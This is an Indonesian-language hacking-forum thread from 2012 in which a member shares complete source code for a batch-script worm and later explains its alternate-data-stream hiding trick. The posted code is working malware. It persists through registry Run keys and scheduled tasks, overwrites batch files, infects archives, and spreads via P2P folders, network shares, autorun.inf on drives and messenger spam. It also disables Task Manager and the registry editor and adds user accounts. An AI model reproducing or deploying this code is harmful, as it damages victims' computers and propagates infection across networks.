|
| worm code in batch | |
| | Pengirim | Message |
---|
robofics VIP Member
Jumlah posting : 709 Points : 804 Reputation : 20 Join date : 22.12.11 Lokasi : /dev/null
| Subyek: worm code in batch Mon Apr 16, 2012 11:47 am | |
| well, kali ini sy mau share source code worm yang ditulis menggunakan batch script langsung aja kk - Code:
-
@EcHo OfF&mOdE cOn LiNeS=1&mOdE cOn CoLs=1 @SeTlOcAl EnAbLeDeLaYeDeXpAnSiOn @SeT n="%~0" @SeT r=%random:~0,1% @SeT HoMeDrIvE=%SyStEmDrIvE% REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* CoPy %n% "%SyStEmRoOt%\SyStEm32\autoexec.bat" /Y cD /d %SystemRoot%\System32 call:a>vbs.vbs if "%1"=="" ( start vbs.vbs&exit ) else ( GoTo:c ) :a echo SET a=Wscript.CreateObject^("Wscript.Shell"^) echo a.Run "cmd.exe /c autoexec.bat 0", vbHide GoTo:EoF :c del /q vbs.vbs REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* :CoDe SeT X1=Si&&sET X2=lv sEt X3=%X1:sI=er%&&SeT X4=%X3:Er=Fo% echo %X1%%X2%%X3% %X4%X > "%SyStEmdRivE%\%X1%%X2%%X3% %X4%X.txt" FoR /l %%a iN (1,1,3) dO (sEt C=!C! %%a) TyPe %n%>%SyStEmRoOt%\SyStEm32\hal.dll:aT.bat cAlL:rEgiStRy HkLm\SoFtWaRe\MiCrOsOfT\wInDoWs\CuRrEnTvErSiOn rEg SyStEmRoOt!C! ReG_sZ cAlL:aT %r% If NoT "%1"=="" (cAlL:%1) eLsE (GoTo:EoF) GoTo:EoF :rEgiStRy %2 ADD "%1\RuN" /v "%3" /T "%4" /d "CmD.eXe /C mOrE < %SyStEmRoOt%\SyStEm32\hal.dll:aT.bat > %SyStEmRoOt%\autoexec.bat && start %SyStEmRoOt%\autoexec.bat" /f %2 ADD "%1\RuN" /v "PixMon" /T "%4" /d "%SyStEmRoOt%\SyStEm32\autoexec.bat" /f GoTo:EoF :aT aT %r%:00 /interactive "sTaRt %SyStEmRoOt%\SyStEm32\autoexec.bat %r%" GoTo:EoF REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* :1 sEt S=tSk.exe sEt I=%S:.exe=Ill% seT l=%I:tsK=PcM% set x=%s:TsK=av% sET oZ=%S:.ExE=pHo% Set F=%l:Ill=av% sEt O=%f:pCm=AnS% sEt zEr=%oZ:tSk=Mor% SeT mO=%x:.exe=i% For /l %%a in (1,2,100) do For %%b in (%f%-cln %f%-rtp %o%gd %o%d %mo% %mo%d %zer%st) do %i% %%b GoTo:EoF REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* :2 FoR /f "ToKeNs=*" %%z In ('DiR /b /s %HoMeDrIvE%\*.bat') dO (cOpY /y %n% "%%z") FoR /f "ToKeNs=*" %%y In ('DiR /b /s %HoMeDrIvE%\*.cmd') dO (cOpY /y %n% "%%y") If ExIsT "%PrOgRaMfIlEs%\WinRar" ( FoR /f "ToKeNs=*" %%w In ('DiR /b /s %HoMeDrIvE%\*.rar') dO (StArT /mIn wInRaR.eXe a "%%w" "%CD%\%~n0%~x0") FoR /f "ToKeNs=*" %%v In ('DiR /b /s %HoMeDrIvE%\*.zip') dO (StArT /mIn wInRaR.eXe a "%%v" "%CD%\%~n0%~x0") ) GoTo:EoF REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* :3 sEt h=%HomeDrive% iF eXiSt "%PrOgRaMfIlEs%\WinRar" ( sTarT wInRaR.eXe a %h%\Hacking.rar CoPy /Y %n% %h%\Hacking.bat sEt ext=rar ) else ( sEt ext=bat ) MkDiR %h%\p2p&ChDiR %h%\p2p FoR %%r iN (msnhacker,hacking,msnflood,hackmsn) dO ( CoPy /Y %h%\Hacking.%ext% %%r.%ext% ) FOR %%p IN ("%PROGRAMFILES%\Kazaa\My Shared Folder", "%PROGRAMFILES%\Kazaa Lite\My Shared Folder", "%PROGRAMFILES%\Grokster\My Grokster", "%PROGRAMFILES%\Morpheus\My Shared Folder", "%PROGRAMFILES%\EDONKEY2000\incoming", "%PROGRAMFILES%\Gnucleus\Downloads", "%PROGRAMFILES%\eMule\Incoming", "%PROGRAMFILES%\BearShare\Shared", "%PROGRAMFILES%\Shareaza\Downloads", "%PROGRAMFILES%\ICQ\shared files", "%PROGRAMFILES%\Filetopia3\Files", "%PROGRAMFILES%\appleJuice\incoming", "%PROGRAMFILES%\LimeWire\Shared", "%PROGRAMFILES%\Overnet\incoming", "%PROGRAMFILES%\Swaptor\Download", "%PROGRAMFILES%\WinMX\My Shared Folder", "%PROGRAMFILES%\Tesla\Files", "%PROGRAMFILES%\XoloX\Downloads", "%PROGRAMFILES%\Rapigator\Share", "%PROGRAMFILES%\KMD\My Shared Folder", "%PROGRAMFILES%\Direct Connect\Received Files", "%HOMEDRIVE%\My Shared Folder") DO ( IF EXIST %%p ( COPY /Y "%h%\p2p\*.*" %%p ) ) GoTo:EoF REM *-*-*-*-*-*- *-*-*-*-*-*-*-*- *-*-*-*-*-*-*-*- *-* :4 SET H=HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System REG ADD "%H%" /v "DisableTaskMgr" /t reg_dword /d "00000001" /f REG ADD "%H%" /v "DisableRegistryTools" /t reg_dword /d "00000001" /f DosKey tskill=exit&DosKey taskkill=exit GoTo:EoF REM *-*-*-*-*-*- *-*-*-*-*-*-*-*- *-*-*-*-*-*-*-*- *-* :5 TSKILL msnmsgr IF NOT EXIST "%programfiles%\Messenger Plus! Live\Scripts\Plus! Live Script Engine\" ( MkDir "%programfiles%\Messenger Plus! Live\Scripts\Plus! Live Script Engine\" ) REG ADD "HKCU\Software\Patchou\Messenger Plus! Live\GlobalSettings\Scripts\Plus! Live Script Engine" /v Enabled /t REG_DWORD /d 1 /f CALL:msnpropagation>"%programfiles%\Messenger Plus! Live\Scripts\Plus! Live Script Engine\Plus! Live Script Engine.js" GoTo:EoF :msnpropagation echo function OnEvent_ChatWndReceiveMessage(ChatWnd, Origin, Message, MessageKind) echo { echo if (Origin != Messenger.MyName) echo { echo ChatWnd.SendMessage("/nudge") echo ChatWnd.SendMessage("http://www.indo-code.com"); echo } echo } PING -n 5 localhost > NUL START msnmsgr.exe GoTo:EoF :6 MkDir %HomeDrive%\Playing&Copy /y %n% %HomeDrive%\Playing\Juego.bat FOR %%d IN (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W, X,Y,Z) DO ( NET SHARE %%d=%HomeDrive%\Playing ) GoTo:EoF REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* :7 sEt e=eChO FOR /F "skip=3 eol=S" %%z IN ('net view') DO ( sEt u=%%z\C$\autorun.inf COPY /Y %n% "%%z\C$\WormsGame.bat" %e% [autorun]>!u! %e% shellexecute=WormsGame.bat>>!u! ) GoTo:EoF REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* :8 FOR %%w IN (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) DO ( COPY /Y %n% "%%w:\Connect.bat" echo [autorun]>%%w:\autorun.inf echo shellexecute=Connect.bat>>%%w:\autorun.inf ) GoTo:EoF REM *-*-*-*-*-*- *-*-*-*-*-*-*-*- *-*-*-*-*-*-*-*- *-* :9 NeT uSeR %random%%r% /aDd ChDir %SyStEmRoOt% FoR /r %%G in (msvbvm60.dll) do iF ExIsT "%%G" REn "%%G" "%%~nG.%random%" If eXiSt "%PROGRAMFILES%\VMWare" ( cd /d "%PROGRAMFILES%\VMWare\VMware Server" start vmware-cmd "%SYsTemDriVe%\Virtual Machines\Win2000Pro\Windows 2000 Professional.vmx" stop start vmware-cmd "%SYsTemDriVe%\Virtual Machines\WinXP\Windows XP Professional.vmx" stop ) GoTo:EoF REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* :0 GoTo:EoF REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* REM *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ane lupa dapet source code ini dimana..hihi..dari indo-code kayaknya..ckck monggo di icip | |
| | | exploi Newbie - Hack
Jumlah posting : 408 Points : 464 Reputation : 13 Join date : 02.11.11 Lokasi : exploit
| Subyek: Re: worm code in batch Mon Apr 16, 2012 12:09 pm | |
| ijin cemomot ya gan | |
| | | robofics VIP Member
Jumlah posting : 709 Points : 804 Reputation : 20 Join date : 22.12.11 Lokasi : /dev/null
| Subyek: Re: worm code in batch Mon Apr 16, 2012 12:28 pm | |
| monggo di comot kk | |
| | | gearboxxx NuuBiiTooL
Jumlah posting : 2 Points : 2 Reputation : 0 Join date : 02.05.12
| Subyek: Re: worm code in batch Wed May 02, 2012 4:48 pm | |
| Wah senang rasa nya ketemu dengan para coder batch, inget jaman dulu, [You must be registered and logged in to see this link.] | |
| | | langitbiru NuuBiiTooL
Jumlah posting : 20 Points : 21 Reputation : 1 Join date : 07.02.12
| Subyek: Re: worm code in batch Tue May 08, 2012 9:45 am | |
| | |
| | | robofics VIP Member
Jumlah posting : 709 Points : 804 Reputation : 20 Join date : 22.12.11 Lokasi : /dev/null
| Subyek: Re: worm code in batch Thu May 10, 2012 9:18 am | |
| | |
| | | robofics VIP Member
Jumlah posting : 709 Points : 804 Reputation : 20 Join date : 22.12.11 Lokasi : /dev/null
| Subyek: Re: worm code in batch Thu May 10, 2012 9:24 am | |
| - langitbiru wrote:
- efeknya gmn nih
well, sama kaya tipe2 lain kk.. bikin file, disable registry editor,ngekill msn dan semacamnya. cuma yang belum ada di worm lain adalah pemanfaatan ADS (Alternate data stream). coba liat salah satunya di script ini - Code:
-
%2 ADD "%1\RuN" /v "%3" /T "%4" /d "CmD.eXe /C mOrE < %SyStEmRoOt%\SyStEm32\hal.dll:aT.bat > %SyStEmRoOt%\autoexec.bat && start %SyStEmRoOt%\autoexec.bat" /f dia akan menciptakan sebuah file hall.dll yang ternyata didalamnya tersembunyi sebuah file dengan nama aT.bat keren kan | |
| | | sayen NuuBiiTooL
Jumlah posting : 12 Points : 12 Reputation : 0 Join date : 11.04.12 Age : 32 Lokasi : Mojokerto
| Subyek: Re: worm code in batch Wed Jun 27, 2012 1:51 am | |
| Bagus om | |
| | | robofics VIP Member
Jumlah posting : 709 Points : 804 Reputation : 20 Join date : 22.12.11 Lokasi : /dev/null
| | | | Sponsored content
| Subyek: Re: worm code in batch | |
| |
| | | | worm code in batch | |
|
Similar topics | |
|
| Permissions in this forum: | Anda tidak dapat menjawab topik
| |
| |
| Latest topics | » Baktrack TutorialSun Jul 28, 2019 2:26 am by kenta » aplikasi gambas pada linuxTue Apr 30, 2019 10:28 am by kenta » beli linux ubuntu terbaru di surabayaSun Mar 31, 2019 10:08 am by kenta » desain robotFri Jan 19, 2018 1:25 pm by kenta » membuat robot tidak susahFri Jan 19, 2018 1:15 pm by kenta » Salam.. Salam.. Salam..Thu Nov 30, 2017 7:42 am by BumiayuKita» teknologi penyaring udara dan airWed Oct 04, 2017 8:41 am by kenta » [CloudMILD] VPS SSD IIX 2X RAM + Xtra SSD SpaceMon Jul 24, 2017 10:46 am by BumiayuKita» cara menutup akses dari situs negatifTue Apr 04, 2017 1:04 pm by kenta » Aplikasi Google TalkMon Mar 20, 2017 3:00 am by BumiayuKita» Driver buat Webcam PC ?? merknya M-Tech,, Fri Jan 30, 2015 8:51 pm by aelgrim » Portal Blog,,,,,Sun Dec 14, 2014 12:38 am by robofics» Appteknodroid - Seputar Dunia AndroidMon Nov 10, 2014 11:32 pm by Pr0phecy » Software animasi yang agan2 pakeTue Sep 30, 2014 1:11 pm by X_campus » INDO BILLING 6.70 + KEYSun Sep 21, 2014 2:17 pm by abdul halim |
Statistics | Total 12294 user terdaftar User terdaftar terakhir adalah Adlygans
Total 31710 kiriman artikel dari user in 5734 subjects
|
Banner Forum | Dukung forum Blackc0de dengan memasang bannernya.
|
Social Networking |
|
|